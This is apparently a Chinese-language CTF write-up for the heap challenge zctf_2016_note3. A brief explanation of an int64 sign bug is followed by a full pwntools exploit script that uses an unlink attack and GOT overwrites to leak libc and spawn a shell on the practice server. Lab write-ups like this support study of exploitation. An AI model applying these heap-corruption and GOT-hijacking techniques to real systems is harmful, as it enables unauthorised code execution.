这个地方有漏洞我是真不知道
这里有个很奇怪的数字
0x8000000000000000
因为v0是int 64然后这里对7取余就会-1
然后看一眼堆空间
我们让v0为-1然后申请完七个堆块我们的size就是地址值就是一个很大的数字然后就用unlink改free的got表为put然后就能泄露我们的libc了
from pwn import*from LibcSearcher import*context.log_level = 'debug'#context.arch = 'amd64'io =process('./zctf_2016_note3')io = remote("node4.buuoj.cn",26937)elf = ELF('./zctf_2016_note3')libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')#libc = ELF('libc-2.23.so')def debug():gdb.attach(io)pause()def creat(length,value):io.sendlineafter("option--->>","1")io.sendlineafter("Input the length of the note content:(less than 1024)",str(length))io.sendlineafter("nput the note content:",value)def edit(id,value):io.sendlineafter("option--->>","3")io.sendlineafter("Input the id of the note:",str(id))io.sendlineafter("Input the new content:",value)def free(id):io.sendlineafter("option--->>","4")io.sendlineafter("Input the id of the note:",str(id))creat(0x100,"aaa")creat(0x100,"bbb")creat(0x10,"ccc")creat(0x10,"ddd")creat(0x10,"eee")creat(0x10,"fff")creat(0x10,"ggg")free(0)creat(0x100,"aaaa")ptr = 0x6020c0+8payload = p64(0) + p64(0x101)payload += p64(ptr- 0x18) + p64(ptr - 0x10)payload = payload.ljust(0x100,'a')payload += p64(0x100) + p64(0x110)edit(0x8000000000000000 - 0x10000000000000000,payload)free(1)free_got = elf.got["free"]puts_got = elf.got["puts"]puts_plt = elf.plt["puts"]atoi_got = elf.got["atoi"]bin_sh_addr = 0x0000000000400f5dpayload = p64(0)*3+ p64(free_got)+p64(puts_got) + p64(atoi_got)edit(0,payload)io.sendlineafter("option--->>","3")io.sendlineafter("Input the id of the note:","0")io.sendafter("Input the new content:",p64(puts_plt)[0:7]+"\n")free(1)puts_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))log.info("puts_addr------------>"+hex(puts_addr))libcbase = puts_addr - libc.sym["puts"]log.info("libcbase------------>"+hex(libcbase))system_addr = libcbase + libc.sym["system"]log.info("system_addr------------->"+hex(system_addr))io.sendlineafter("option--->>","3")io.sendlineafter("Input the id of the note:","2")io.sendafter("Input the new content:",p64(system_addr)[0:7]+"\n")io.sendline("/bin/sh\x00")#debug()#debug()io.interactive()
若有收获,就点个赞吧
0 人点赞
